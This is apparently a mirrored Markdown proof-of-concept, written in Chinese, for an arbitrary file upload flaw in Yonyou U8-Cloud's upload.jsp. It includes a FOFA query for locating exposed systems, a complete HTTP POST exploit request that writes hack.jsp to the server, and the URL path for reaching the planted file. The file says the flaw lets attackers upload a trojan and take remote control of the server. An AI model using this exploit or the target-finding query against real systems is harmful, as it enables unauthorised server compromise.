mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
29 lines
693 B
Markdown
29 lines
693 B
Markdown
|
||
## 用友U8-Cloud upload任意文件上传漏洞
|
||
该系统upload.jsp存在任意文件上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器
|
||
|
||
## fofa
|
||
```app="用友-U8-Cloud"```
|
||
|
||
## exp
|
||
```
|
||
POST /linux/pages/upload.jsp HTTP/1.1
|
||
Host:
|
||
User-Agent: Mozilla/5.0
|
||
Connection: close
|
||
Content-Length: 31
|
||
Content-Type: application/x-www-form-urlencoded
|
||
filename: hack.jsp
|
||
Accept-Encoding: gzip
|
||
|
||
<% out.println("The website has vulnerabilities!!");%>
|
||
```
|
||
## 漏洞复现
|
||

|
||
|
||

|
||
|
||
## 路径
|
||
http://ip:port/linux/hack.jsp
|
||
|